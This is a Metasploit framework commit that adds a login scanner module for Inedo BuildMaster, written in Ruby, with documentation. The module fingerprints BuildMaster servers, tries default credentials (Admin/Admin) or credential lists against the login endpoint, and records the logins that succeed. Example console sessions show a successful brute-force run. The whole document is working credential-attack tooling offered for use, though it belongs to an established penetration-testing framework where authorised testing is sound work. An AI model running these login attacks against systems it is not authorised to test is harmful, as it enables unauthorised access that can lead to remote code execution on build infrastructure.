Land rapid7#8891 login scanner for Inedo BuildMaster

h00die · h00die · commit 273d49bffd99 · 2017-09-24T13:30:17.000-04:00
diff --git a/documentation/modules/auxiliary/scanner/http/buildmaster_login.md b/documentation/modules/auxiliary/scanner/http/buildmaster_login.md
@@ -0,0 +1,59 @@
+## Description
+
+This module allows you to authenticate to Inedo BuildMaster, an application release automation tool.
+The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution.
+
+## Vulnerable Application
+
+[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide)
+
+[Inedo website](http://inedo.com/)
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/buildmaster_login```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: Set credentials
+5. Do: ```run```
+6. You should see the module attempting to log in.
+
+## Scenarios
+
+### Attempt to login with the default credentials.
+
+```
+msf > use auxiliary/scanner/http/buildmaster_login
+msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
+RHOSTS => 10.0.0.39
+msf auxiliary(buildmaster_login) > run
+
+[+] 10.0.0.39:81          - Identified BuildMaster 5.7.3 (Build 1)
+[*] 10.0.0.39:81          - Trying username:"Admin" with password:"Admin"
+[+] SUCCESSFUL LOGIN - 10.0.0.39:81          - "Admin":"Admin"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(buildmaster_login) >
+```
+
+### Brute force with credentials from file.
+
+```
+msf > use auxiliary/scanner/http/buildmaster_login 
+msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
+RHOSTS => 10.0.0.39
+msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt
+USERPASS_FILE => ~/BuildMasterCreds.txt
+msf auxiliary(buildmaster_login) > run
+
+[+] 10.0.0.39:81          - Identified BuildMaster 5.7.3 (Build 1)
+[*] 10.0.0.39:81          - Trying username:"Admin" with password:"test"
+[-] FAILED LOGIN - 10.0.0.39:81          - "Admin":"test"
+[*] 10.0.0.39:81          - Trying username:"Admin" with password:"wrong"
+[-] FAILED LOGIN - 10.0.0.39:81          - "Admin":"wrong"
+[*] 10.0.0.39:81          - Trying username:"Admin" with password:"Admin"
+[+] SUCCESSFUL LOGIN - 10.0.0.39:81          - "Admin":"Admin"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(buildmaster_login) > 
+```
diff --git a/modules/auxiliary/scanner/http/buildmaster_login.rb b/modules/auxiliary/scanner/http/buildmaster_login.rb
@@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Inedo BuildMaster Login Scanner',
+      'Description' => %{
+          This module will attempt to authenticate to BuildMaster. There is a default user 'Admin'
+          which has the default password 'Admin'.
+      },
+      'Author'         => [ 'James Otten <jamesotten1[at]gmail.com>' ],
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' => { 'VERBOSE' => true })
+    )
+
+    register_options(
+      [
+        Opt::RPORT(81),
+        OptString.new('USERNAME', [false, 'Username to authenticate as', 'Admin']),
+        OptString.new('PASSWORD', [false, 'Password to authenticate with', 'Admin'])
+      ]
+    )
+  end
+
+  def run_host(ip)
+    return unless buildmaster?
+
+    each_user_pass do |user, pass|
+      do_login(user, pass)
+    end
+  end
+
+  def buildmaster?
+    begin
+      res = send_request_cgi('uri' => '/log-in')
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      print_error("#{peer} - HTTP Connection Failed")
+      return false
+    end
+
+    if res && res.code == 200 && res.body.include?('BuildMaster_Version')
+      version = res.body.scan(%r{<span id="BuildMaster_Version">(.*)</span>}).flatten.first
+      print_good("#{peer} - Identified BuildMaster #{version}")
+      return true
+    else
+      print_error("#{peer} - Application does not appear to be BuildMaster")
+      return false
+    end
+  end
+
+  def login_succeeded?(res)
+    if res && res.code == 200
+      body = JSON.parse(res.body)
+      return body.key?('succeeded') && body['succeeded']
+    end
+    false
+  rescue
+    false
+  end
+
+  def do_login(user, pass)
+    print_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    begin
+      res = send_request_cgi(
+        {
+          'uri' => '/0x44/BuildMaster.Web.WebApplication/Inedo.BuildMaster.Web.WebApplication.Pages.LogInPage/LogIn',
+          'method' => 'POST',
+          'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
+          'vars_post' =>
+            {
+              'userName' => user,
+              'password' => pass
+            }
+        }
+      )
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      vprint_error("#{peer} - HTTP Connection Failed...")
+      return :abort
+    end
+
+    if login_succeeded?(res)
+      print_good("SUCCESSFUL LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
+      store_valid_credential(user: user, private: pass)
+    else
+      print_error("FAILED LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
+    end
+  end
+end
